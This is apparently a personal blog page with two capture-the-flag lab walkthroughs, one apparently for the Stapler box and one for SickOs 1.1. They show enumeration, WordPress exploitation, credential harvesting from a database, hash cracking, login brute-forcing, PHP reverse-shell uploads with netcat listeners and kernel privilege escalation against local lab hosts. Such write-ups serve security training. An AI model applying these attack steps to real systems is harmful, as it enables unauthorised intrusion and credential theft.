|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2020-04-20T23:18:17+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-21 03:48:17
|_  start_date: 1601-01-01 05:53:28
********************************** We are enumerate more on our finding, however, I really like web. Therefore, I will begin my enumeration there. Let’s browser 
192.168.56.4:12380
I didn’t find anything from robots.txt, however in the source code, there are few things that might interest you too 🙂 I must admit that when I see the base64 encrypted link, I thought yes this is it, and try various ways to get around it. Nevertheless, Download the image using curl (wget didn’t work for me, I don’t get why..) 
curl http://192.168.56.4:12380/images/default.jpg -o default.jpg
Yes, I am gonna run an exiftool on it I found Zoe while reading the source code, and now Tim. I think it is good idea to collect it on some separate file. Who knows, we could use it to brute force. I ran gobuster to check any directory with my favorite dictionary wordlist, it’s taking lot of time, so I ran nikto along with it. I afraid I might not get anything at the end. 
gobuster dir -u http://192.168.56.4:12380 -w /usr/share/wordlists/directory-list-2.3-medium.txt -o gobuster12380.log
nikto -h http://192.168.56.4:12380 > nikto12380.log
To be honest, I was not able to get any concrete result. Therefore, I took some time off and watched few entertainment videos (usually I like cooking videos because I like to cook and experiment new foods. By the way I am Lacto-Ovo Veg guy). After resuming, I still can’t come up anything new, however, recently I began to watch ippsec videos (which were awesome) and I remember him extracting domain name through ssl certificate. Therefore, I tried to but https:// in the link, and guess what I got? robots.txt. 
https://192.168.56.4:12380/robots.txt
Since blogblog is a wordpress based website, so I ran wpscan with it. However, I was not able to enumerate the plugins and versions of it. I had to read couple of blog posts and check their official github. I even install the WordPress which was written in Python and it appears to me that it is still in development mode that not many functionalities were present, so it didn’t help much. While, I found in their official document that if we run the commands with option –stealth –plugin 
wpscan --stealthy --url https://192.168.56.4:12380/blogblog/ --plugins-detection aggressive -o wp_report.log
I tried to google the plugins and found the above highlight plugin has a local file inclusion vulnerability. Looks like the exploit is little buggy because I tried it with both python2 and python3. It execution was not complete but when I browser back the homepage, I can see new post entry and I was glad that it did inject something there. Because in the past, when I had to exploit kernel, many exploit didn’t complete their execution but I got root. Likewise, I little hopeful here as well.(Nevertheless, I remind myself that I will need to go through the exploit again if I am left with no option). I was not happy, thought to give it a try to fix the exploit and finnaly I was able to fix the exploit by embedding two lines of code. (Yeh!!) 
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
I have collection quite a good number of users, both through manual enumeration and wpscan results. So, my backup plan is to run a brute force. However, let me check uploads folder. 
https://192.168.56.4:12380/blogblog/wp-content/uploads/
It’s a customary happy that when I find an image, I run exiftool command and if it is normal, I leave it. Else, I run string command to further the analysis.  First Image: Second Image: And we can see that it is a php file. After running a strings command, we got a credential to the mysql database. 
mysql -uroot -pplbkac -h 192.168.56.4

show databases; 
use wordpress;
show tables;
select * from wp_users;
I did copy all the hashes to a file called hash.txt and planned to crack it using hashcat. Luckily I have my notes which I took from ippsec videos. 
hashcat --example-hashes | less
Since our Hash begins with $P$, I search this pattern and found MODE: 400 
hashcat -m 400 hash.txt  /usr/share/wordlists/rockyou.txt --force
I got few low privileged user’s cracked password. Right now, I am at the foothills of the Himalaya and weather is quite cold during night (specially) however, my laptop is emitting heat like a little fireplace and fan is roaring so loud. I had to play around with the incomplete result I got. I tried all, and all of those has very limited access. I know that based on the ID assignment of the WordPress user, 99.99% of the time, ID 1 is the admin user. And if we assume this logic then user john is the admin. I am afraid to put my poor laptop for test. So I had to find another way, it is use wpscan to bruteforce the user access.  
 wpscan --url https://192.168.56.4:12380/blogblog --passwords /usr/share/wordlists/rockyou.txt --usernames john --max-threads 50 --disable-tls-checks
john: incorrect
Yes, user john is the admin with password incorrect You will get almost all the shells from pentest monkey. Method 1: Paste the shell on 404.php  Failed Usually I try to modify 404.php file and paste the shell there. However, this time it is quite peculiar that I can’t find update button lol   Method 2: Upload a shell.php.jpg with GIF98  Failed   Method 3: Creating Plugin or Theme. Yeah!! Sometimes, it might not work. In order to work, you need to have plugin (or theme) header like this. I just copied the header from the plugin which is already exist in the site and pasted it in my shell. Usually, we need to zip it and upload it. However, I am not sure why.. on this box, even without zipping, it worked. By the way, it may ask you FTP credentials. You just enter 
host: 192.168.56.4 
User: anonymous 
Password: anonymous
Because I did check whether it is working the second time. First, we know it is working through nmap result. you don’t have to wait long. (though system may appear as if it is taking time to load). Goto uploads folder to check your shell. After this, you need to wait the reverse connection on your host machine through nc. 
nc -lvp 1234
As soon as you click the shell.php, you get a reverse connection. (Poc Proof of Concept) Finally I got a shell. Now I need to do Privilege Escalation to get root access and find flag, if there is any. I tried to find SUID, checked entry in /etc/crontab, whether /etc/pass is writable etc.. No luck 🙁 So, I upload the LinEnum.sh (Linux Privileges Escalation script) and, planted it in /tmp folder. Guess what I found… Possible Path 1: Possible Path 2: Let’s first follow the Path 1: 
ssh JKanode@192.168.56.4   (it doesn't have the sudo privilege and let's waste no time here)
 ssh peter@192.168.56.4
Yippy! We got the root and flag !! Second Path: A Failed   I found that the current running kernel is vulnerable to privilege escalation and the exploit is available on exploit-db. Link is here. By reading the exploit, I came to know that it has two program in it. decr.c and pwn.c These highlight passage help us how to run the exploit. 
gcc decr.c -m32 -O2 -o decr

./decr
I think it is going to take awhile.. going to have a shower 🙂   Ops!! It didn’t work.. For time being, I will be happy with the root that I got previously.. Because need to work now 🙂 Second Path: B Yeh!!  
cat /etc/os-release
source of the exploit is here. We need to keep the above screenshot very carefully because it has mentioned on how to use the exploit and how long you have to wait for the execution to over. (You will notice that I type many id(s)) lol Transfer the exploit to the victim or target machine. And the flag is here. Yeh!!   Note: I didn’t write all those rabbit holes… because some trolls were so good that I felt as if I am going to get something after this or that lol Specially when I get the backup files and other secret notes..  I learned quite a lot from this box.
No Comments
samdup, tcert

Walkthrough for SickOs 1.1

Firstly we need to know the machine (Target Machine) IP address. I know three ways to get it, but in this write up, I will go with the one which I picked up recently. By the way, my Host IP address is 192.168.56.1 
sudo arp-scan --interface=vboxnet0 192.168.56.1/24
Target Machine IP : 192.168.56.3 Now, we need to know what services, ports etc. are running on the machine. 
nmap -sC -sV -p- -Pn 192.168.56.3/24 -oN nmap.log
We can clearly see that it is running 1. SSH 22 2. http-proxy Squid http proxy on port 3128 I had to struggle a little on Squid Proxy because I thought too much like its functionalities and lot of other stuffs.. I was little disappoint with gobuster, however nikto really helped me in this. 
nikto -h http://192.168.56.3 -useproxy http://192.168.56.3:3128
I am happy that it ran, but it didn’t me any important things. Without Proxy Hats-off to foxy-proxy. It made my life easy. After setup, we got the access to the website. There isn’t anything in the source code. 
Browse http://192.168.56.3/wolfcms/?about-us.html
I visited almost all the page and links and came saw there is ? in all the URL http://192.168.56.3/wolfcms/? Besides, every CMS has a admin panel login like wp-login.php or wpadmin for wordpress and admin for joomla. Likewise, I tried login and admin. And finally, admin parameter helped me to redirect to the login page. 
Visit  http://192.168.56.3/wolfcms/?/admin/login
I tried admin:password and admin:admin for username and password respectively and admin:admin did logged in. Then, I didn’t bother much as soon as I saw the Home page with PHP code, written in it. I paste a php revershell, and it did work for me. On my host machine, I am waiting a reverse connection from the above CMS. 
nc -lvp 9000
As soon as I visit the Homepage, I got a reverse connection. 
python -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm
From above, we can conclude that there is a username called sickos.  And since we know that there is CMS is running, it can be certain that there is file which contains Database Credentials like wp-config.php in WordPress. username: root and sickos (Which we got from above enumeration) password: john@123 I tried ssh connection with above credentials. Only username with sickos@192.168.56.3  worked with the password john@123 Every time, as soon as I got ssh, I like to check the privilege of the user with sudo -l The current user has the sudo permission allowed. we got the flag, finally 🙂 It’s almost 11PM here, I think now I can have a good night sleep 🙂
No Comments
samdup, tcert